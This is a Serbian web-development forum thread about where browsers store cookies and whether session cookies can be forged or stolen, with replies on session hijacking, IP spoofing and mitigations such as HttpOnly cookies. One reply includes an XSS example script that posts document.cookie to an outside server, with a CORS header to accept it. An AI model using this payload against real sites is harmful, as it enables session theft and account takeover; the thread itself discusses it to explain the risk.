Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Gde se čuva kolačić od sajta na kompu?

[es] :: Web razvoj :: Gde se čuva kolačić od sajta na kompu?

Strane: 1 2

[ Pregleda: 3028 | Odgovora: 20 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

sneguljko
Sneguljko doo

Član broj: 341399
Poruke: 51
*.dynamic.vipmobile.rs.

Sajt: https://sneguljko.com


+6 Profil

icon Gde se čuva kolačić od sajta na kompu?29.11.2019. u 07:44 - pre 52 meseci
Pitanje je gde se čuva cookie od sajta i da li može veštački da se napravi ako se zna koje podatke sadrži. Moj sajt ostavlja cookie samo sa brojem sesije. I sad svako ko ima taj kolacic može da se automatski loguje. To je velika bezbedonosna rupa AKO može da se imitira kolacic.
 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
87.116.177.*

Sajt: angelstudio.org


+392 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 08:24 - pre 52 meseci
Moze da se imitira, nije problem. Problem je doci do njega, sto je vrlo tesko ako se koristi ssl/tls.
Pogledaj gde browser koji koristis skladisti privremene podatke, kod linux firefoxa je ~/.mozilla/firefox/ a u Windowsu u AppData folderu unutar korisnickog home foldera. Stikliraj opciju da vidis skrivene (hidden) fajlove i pronaci ces.

Code:
bojan@debian:~$ ls -l ~/.mozilla/firefox/dzvsu2g0.default/cookies.sqlite
-rw-r--r-- 1 bojan bojan 1572864 Nov 29 09:16 /home/bojan/.mozilla/firefox/dzvsu2g0.default/cookies.sqlite
 
Odgovor na temu

Zlatni_bg
Nikola S
Beograd

Član broj: 65708
Poruke: 4420
*.dynamic.sbb.rs.



+498 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 10:47 - pre 52 meseci
Naravno da moze. Zato stitis i sesiju, koristis csrf i jos neke stvari kada pravis aplikaciju.
THE ONLY EASY DAY WAS YESTERDAY
 
Odgovor na temu

Zlatni_bg
Nikola S
Beograd

Član broj: 65708
Poruke: 4420
*.dynamic.sbb.rs.



+498 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 10:48 - pre 52 meseci
Inace pre 6 7 godina je najjaca fora bila sesti sa snifferom u kafic... ne trebaju ti nicije sifre niti bilo sta drugo.
THE ONLY EASY DAY WAS YESTERDAY
 
Odgovor na temu

Milan Kragujevic
Software Engineer

Član broj: 231903
Poruke: 2220
*.dynamic.sbb.rs.

Sajt: https://milankragujevic.c..


+201 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:03 - pre 52 meseci
Ograniciti validnost sesije na IP adresu i User Agent string uz isticanje i obnavljanje i vecina sigurnosnih problema mogu biti reseni.
 
Odgovor na temu

nkrgovic
Nikola Krgović
Beograd

Član broj: 3534
Poruke: 2807

ICQ: 49345867
Sajt: https://www.twinstarsyste..


+655 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:34 - pre 52 meseci
Citat:
Milan Kragujevic: Ograniciti validnost sesije na IP adresu i User Agent string uz isticanje i obnavljanje i vecina sigurnosnih problema mogu biti reseni.

Ne. I jedno i drugo se usnifa sve zajedno ako nemas https konekciju. Jedino resenje za bezbednu sesiju je enkriptovana sesija. Ako je cookie session tipa onde bar traziti re-login (ako to ne omogucis nekako) kad se neko drugi okaci pre tebe....

Naravno, ako imas REST i nemas sesiju, prica se menja. :) Onda stitis token...
Please do not feed the Trolls!

Blasphemy? How can I blaspheme? I'm a god!'
 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
87.116.177.*

Sajt: angelstudio.org


+392 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:35 - pre 52 meseci
Ako neko zeli da hakuje i dovoljno je sposoban, bilo sta sem ssl/tls je nedovoljno, kad vec neko ima nameru da krade broj kreditne kartice i takve stvari.
Http user agent se lako moze da proizvoljno postavi, ip malo teze, ali i to moze recimo na linuxu, i ako os ne podrzava to direktno iz sigurnosnih razloga, kao windows, ne mozes racunati da je napadac nesposoban da to izprogramira od nule.
 
Odgovor na temu

Milan Kragujevic
Software Engineer

Član broj: 231903
Poruke: 2220
*.dynamic.sbb.rs.

Sajt: https://milankragujevic.c..


+201 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:44 - pre 52 meseci
Enkripcija nece pomoci kod session hijacking napada, jer je sama enkripcija beznacajna kako se verbatim string iz cookie moze ukrasti.

Druga stvar XSS je veci problem nego MITM. Sto se tice laziranja IP adrese, to je nemoguce. Moze se prikriti uz proxy ali nikako promeniti na proizvoljnu vrednost.

 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
87.116.177.*

Sajt: angelstudio.org


+392 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:52 - pre 52 meseci
U pravu si, moze da se posalje paket sa kastom hederom koji sadrzi laznu IP, ali nece moci da se rutira odgovor.
 
Odgovor na temu

Branimir Maksimovic

Član broj: 64947
Poruke: 5534
109.72.51.23



+1064 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:54 - pre 52 meseci
sta bi bio session hijacking napad? Mislim mogu da zamislim tako nesto, ali bez pristupa zrtvinom kompu tesko izvodljivo.
 
Odgovor na temu

Branimir Maksimovic

Član broj: 64947
Poruke: 5534
109.72.51.23



+1064 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 18:55 - pre 52 meseci
Citat:
bojan_bozovic:
U pravu si, moze da se posalje paket sa kastom hederom koji sadrzi laznu IP, ali nece moci da se rutira odgovor.


to ti je isto kao kad posaljes pismo sa laznom povratnom adresom :P
 
Odgovor na temu

Milan Kragujevic
Software Engineer

Član broj: 231903
Poruke: 2220
*.dynamic.sbb.rs.

Sajt: https://milankragujevic.c..


+201 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 19:15 - pre 52 meseci
Citat:
Branimir Maksimovic:
sta bi bio session hijacking napad? Mislim mogu da zamislim tako nesto, ali bez pristupa zrtvinom kompu tesko izvodljivo.


Scenario:

Pošalješ "žrtvi" bit.ly link koji vodi na nekisajt.com/login?error=<neki JS kod>. Žrtva klikne na link, i tom prilikom se izvrši JS kod koji pokupi cookies i pošalje ih na tvoj server ajax zahtevom.

Uslov je da je programer bio lenj i nije napravio whitelist poruka o grešci, niti se koristi escape tagova < i >, tj. sve što se primi kroz GET promenjivu error se ispiše na stranicu, a da ne postoji restrikcija sesije za IP adresu i user agent.

Rešenje se sastoji od krpljenja propusta koji dozvoljava ispis i izvršavanje nepoznatog koda, kao i ograničavanje sesije na određenu IP adresu i User-Agent string uz rok trajanja od 24h sa obnavljanjem.

Kod može da izgleda ovako:

Code:

<script>
$.post('https://mojsajt.com/endpoint', { cookies: document.cookie });
</script>


Da pojasnim komentar povodom korišćenja enkripcije kao zaštite:

Sesija se čuva na serveru a klijent u svom cookie store-u ima Session ID, koji vezuje sesiju sa tim browser-om. Enkripcija SessionID je beskorisna jer se koristi samo za vezivanje browser->session store, a kako browser sam radi management cookie-ja, nemoguće je raditi dekripciju pri slanju na server, usled čega dolazimo do toga da je to gubljenje vremena.

A što se tiče lažiranja header-a TCP paketa, ruter provajdera će to odbaciti kako ne odgovara dodeljenoj IP adresi korisnika. To se inače radi kako bi se sprečio DDoS amplification napad, gde npr. 50 000 računara sa jako malim protokom pošalje TCP paket ka google.com gde kao source navode IP žrtve, i onda Google pošalje 50 000 response paketa "žrtvi", gde je svaki response paket npr. par MB, a svaki request <1KB.

Čuveni primer DDoS amplification napada je NTP DDoS, konkretno primer iz 2014., kada je ostvaren protok od 400 Gbps ka CloudFlare endpoint-u -- https://blog.cloudflare.com/te...ntp-amplification-ddos-attack/

Dakle, svi normalni ISP-grade ruteri će odbiti paket koji nije mogao da bude validno poslat od strane korisnika. Pogotovu što je sve veći broj korisnika iza CGNAT, gde je praktično nemoguće išta nevalidno progurati.
 
Odgovor na temu

Branimir Maksimovic

Član broj: 64947
Poruke: 5534
109.72.51.23



+1064 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 19:43 - pre 52 meseci
"Pošalješ "žrtvi" bit.ly link koji vodi na nekisajt.com/login?error=<neki JS kod>. Žrtva klikne na link, i tom prilikom se izvrši JS kod koji pokupi cookies i pošalje ih na tvoj server ajax zahtevom."

Za tako nesto ti treba da haknes server sto je jos teze. Ne verujem da JS moze kako hoce da skida fajlove sa diska...
 
Odgovor na temu

Milan Kragujevic
Software Engineer

Član broj: 231903
Poruke: 2220
*.dynamic.sbb.rs.

Sajt: https://milankragujevic.c..


+201 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 20:01 - pre 52 meseci
Zašto bi morao da čita fajlove sa diska? Sa čijeg diska?

Korisnikov browser će cookies upisati u document.cookie.

Poenta je impersonirati korisnika na nekom sajtu, dakle, haker će kasnije sa prikupljenim podacima [automatski, verovatno] pristupiti tom sajtu pritom pružajući cookie sa session id koji je ukraden od korisnika.

Dakle, sa strane gledišta servera gde je sajt, haker je žrtva, jer imaju isti session id. Sa strane žrtve, sajt je zatražio da očita cookies i onda poslao na drugi domen, što je dozvoljeno*. Dakle, sve OK, a ovamo ti neko ukrade nalog.

* Jedini problem može da bude CORS, ali to je sa strane domena hakera, tj. zabrana slanja POST request-a drugom domenu. Haker može zaobići taj problem tako što će na svom serveru staviti header

Access-Control-Allow-Origin: *
 
Odgovor na temu

nkrgovic
Nikola Krgović
Beograd

Član broj: 3534
Poruke: 2807

ICQ: 49345867
Sajt: https://www.twinstarsyste..


+655 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 20:13 - pre 52 meseci
Cekaj bre malo...

Ti na svoj server stavis javascript koji odradi {cookies: document.cookie}. To ti vrati sve cookies za domen ka kome ide request, sve ql. Kako ti CORS policy Allow Origin * pomaze? Nece ti, sta god ti stavio u CORS, browser poslati cookies za drugi domen....

edit: Jedino sto Bane kaze, ako to stavis na server kome hoces da ukrades login, ali ako mozes da stavis nesto na server, onda koj' ce ti djavo cookie od jednog usera. ;) Udji lepo u bazu, napravi sebi user sa kojim 'oces privilegijama....
Please do not feed the Trolls!

Blasphemy? How can I blaspheme? I'm a god!'
 
Odgovor na temu

Milan Kragujevic
Software Engineer

Član broj: 231903
Poruke: 2220
*.dynamic.sbb.rs.

Sajt: https://milankragujevic.c..


+201 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 20:33 - pre 52 meseci
Jaoj kao Kineski da pišem.

XSS omogući izvršavanje hakerovog JS koda na sajtu koji posećuje žrtva. Taj JS kod šalje cookies AJAX request-om na sajt koji kontroliše haker a koji je podešen da CORS omogući primanje tih cookies sa 3rd party domena.

Bukvalno jedan od najpopularnijih načina krađe kredencijala korisnicima na OWASP listi...

https://pentest-tools.com/blog/xss-attacks-practical-scenarios/
 
Odgovor na temu

Shadowed
Vojvodina

Član broj: 649
Poruke: 12846



+4783 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 20:38 - pre 52 meseci
Ne. To sto on prica je AKO postoji bug na toj web aplikaciji takav da taj kod vrati u okviru html-a a pri tome ne escape-uje. No, to je suvise specifican slucaj za ovu pricu.
 
Odgovor na temu

nkrgovic
Nikola Krgović
Beograd

Član broj: 3534
Poruke: 2807

ICQ: 49345867
Sajt: https://www.twinstarsyste..


+655 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?29.11.2019. u 21:52 - pre 52 meseci
Pa ok, sad kapiram ali sto kaze @Shadowed to znaci da imas bug koji ti omoguci XSS.
Please do not feed the Trolls!

Blasphemy? How can I blaspheme? I'm a god!'
 
Odgovor na temu

sneguljko
Sneguljko doo

Član broj: 341399
Poruke: 51
*.dynamic.vipmobile.rs.

Sajt: https://sneguljko.com


+6 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?30.11.2019. u 16:39 - pre 52 meseci
Napraviste celu filozofiju oko obične sesije. :)
 
Odgovor na temu

Deunan

Član broj: 338178
Poruke: 83
*.dynamic.isp.telekom.rs.



+21 Profil

icon Re: Gde se čuva kolačić od sajta na kompu?30.11.2019. u 19:34 - pre 52 meseci
Citat:
sneguljko:
Napraviste celu filozofiju oko obične sesije. :)

Pa dobro, o sigurnosti sajta treba pripaziti.

Proveri da li ti cuva HttpOnly cookies. Oni ne mogu da se procitaju javascriptom. To bi trebalo da resi skoro sve XSS napade (ako slucajno napravis propust u kodu).
Ako koristis neki framework, oni obicno koriste "signed cookies". Tako da je tesko da neko nasumicno pogodi, mora i da ga sifruje da bi ga server prihvatio.
 
Odgovor na temu

[es] :: Web razvoj :: Gde se čuva kolačić od sajta na kompu?

Strane: 1 2

[ Pregleda: 3028 | Odgovora: 20 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.